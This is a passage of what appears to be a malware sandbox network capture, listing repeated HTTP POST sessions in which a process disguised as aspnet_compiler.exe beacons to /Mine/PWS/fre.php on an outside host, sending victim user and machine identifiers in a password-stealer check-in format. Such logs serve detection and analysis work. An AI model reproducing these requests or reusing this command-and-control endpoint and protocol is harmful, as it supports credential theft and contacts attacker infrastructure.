                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eLe32ZI%2FG%2BuYU3ABNJRRuZeHkyNL00TkKjEOJCmQZPeVfr3a0hu6P3VKaIf%2BTosLtMLeOOtUS2YnzCnDiq3Vt4z3XMKOnN5JgCX6bvQjhEiZSLYP5MMh866Vqg0QhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad8f4ea04e972-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2639&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.549757188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:23.205740929 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:23.211146116 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:24.412775993 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:24 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ciScChgOKV53j9TS3Z3ZHBFJdj1KdJt5nFbAlbeocgkV5PqB9RC%2BVHXaqmdoxIfxQ2eZwd25%2F1YNoiZzbZrq0wO1T9IhXyk2UVb1G%2Bi5SdIPvaYq4p7q8EjDBio6ow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad8fe6fc23177-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1384&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.549763188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:24.555114031 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:24.561675072 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:25.588660002 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:25 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=25RhSey%2FcM%2BswRdxG1LMHPNnjkRvLpDD5pIkJy1uHxYZwdLngLIuKBn6ZqOb9uW69EUGrO%2FtNqkVL9uzJlCvKrWr19pfk2EZOlVRRJ13VeaN3Xf4V9SWDWbbnb2ppw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad906ddf33587-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1027&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.549774188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:25.740081072 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:25.747925043 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:26.637290955 CEST776INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:26 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=za4JpOlF%2BOgek7zH6Hn0LC5oUB3J%2FP7D27N4YmPUBUaMmWtaDYJcE3yngqA3ZwkiGepz%2FGHtMnz9cjJmuUP3yNi%2Fcmp9DjGPmmADDkwdUrTQOf1wKeLCedVdbVEC1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad90e4a42eb16-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1342&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.549780188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:26.789365053 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:26.794869900 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:27.668710947 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:27 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5K7iotL3nAhCSPYeShaXClHk1grtDcAKT0KQvzyS19YO3ayDZ04vy0aT1%2FOrjxGa4u5hhBh2jrsiScbn5D%2FY0CMpJHbPF1HxsgP3Oojd54zA9%2F5MHLSdjcOPU9wTng%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad914dcb44686-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1164&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.549786188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:27.819351912 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:27.825460911 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:28.717905045 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:28 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e2M2Qre%2B6VFO1EHq7YppP8IiDqk862QfLwmiSfExtL0%2BArSrm3a00JPHe6jtDyrYl8%2FDcXU9BC8x0vTkEPGP4hEgqL8etDNeX14uLFcxTTeUJvyg6vCqgBfDEtS9Ug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad91b3a426c4f-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1960&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.549792188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:28.873809099 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:28.879211903 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:29.781430006 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:29 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eu308C6Ct2CohWKQtNacv2V7v4cXH4kloVKKMFPmpdHE1GsJlXiHSmjNZlMZ%2BkJdKPvC3SeyryLD4ubhiX0uN0XLaua9EzLpvxhATYhI0%2FGy2aRjlCoeKFlh%2FbMnWw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad921eb92e836-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=2232&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      16192.168.2.549798188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:29.931011915 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:29.936630011 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:30.857218981 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:30 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Os%2B5AK2Olpaw6rtRTHBzN5kgkEFg%2BLu7s2gKfOY6HJKS9C0iulTwmZnCPX4hTssvbiJLTtsNOMaHsPZnpG%2BeE8fxOMZKOMkNyWS1O2jol9lvhQw3bfx8MQLuqXYXCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad9286fe54785-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1237&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      17192.168.2.549806188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:31.009783030 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:31.015360117 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:33.136374950 CEST773INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:33 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=50QhMYSqwXKbd4dAt2So0M3A8SNMYi92MLmJgic%2FSypVUrpSlvIXI2bvVXuV4mIxVpEJBj1%2FnZLAKjVwk%2BppjQ8Ccb1xaLilHo79niPKnuvRwyJYhZ1Aix68fHnjqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad92f2f5f8d2c-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1644&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=81&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      18192.168.2.549820188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:33.293499947 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:33.298933029 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:34.213545084 CEST778INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:34 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4pLn2gnsA6xxnF7szO%2BWWnraqx%2FYya5W3HTHBbRo0np%2FS55TYuV5o3fEg%2Bg58N3RUxpzZs1aErMpK4CZa52IP8HuPVdXlQ9GUYlEl3rngImI4rwhl%2BTMHF0VKhDKfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad93d7a7b6b3c-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1938&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      19192.168.2.549826188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:34.366801977 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:34.372256041 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:35.272162914 CEST774INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:35 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xZHLcL%2BmGZTykGDUb7wogaVViCdsHa3QnMB46GUt9xRjhaa0Z6sQe4GYLpeXxJVqgTt9yaHy1iN4hQAGHxJI%2F17AfbOjC9mS7M3GHwNwI3psoi3mrngZ06%2BsAYGqJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad9442cf33474-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1155&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.2.549832188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:35.413671970 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:35.421422958 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:37.391191006 CEST768INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:37 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYfuQWh1ubE6HwrD2PVFy8pPLBrP7fVwJMfundcELeNFsjHovegYWfIoCKNFtIF4ryZGybLO5WeZSF5rQRWVsBmrCctHk0UfobPkzlLNVBEOxRMebi2g86kOzRudug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad94afa724605-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1142&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.2.549845188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:37.539633989 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
                                      Oct 24, 2024 17:02:37.545567989 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                      Data Ascii: (ckav.rualfons849224ALFONS-PC0FDD42EE188E931437F4FBE2C
                                      Oct 24, 2024 17:02:38.478197098 CEST772INHTTP/1.1 404 Not Found
                                      Date: Thu, 24 Oct 2024 15:02:38 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      cf-cache-status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tLQk0UjL3x%2BLzVyi4coA%2FhX83SNnECLY0k09LvGrIcXxb2cwJIO5DWHA2MLtxu3DKYjSEUWyIz8YRcgfg6qLVpG6cmkwhVZREISEaw7LeXWhYLoGU9YtzHKSt9abOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8d7ad9582e8145f9-DFW
                                      alt-svc: h3=":443"; ma=86400
                                      server-timing: cfL4;desc="?proto=TCP&rtt=1169&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=393&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.2.549853188.114.96.3806128C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                      TimestampBytes transferredDirectionData
                                      Oct 24, 2024 17:02:38.632541895 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: dddotx.shop
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: 925F43C2
                                      Content-Length: 153
                                      Connection: close
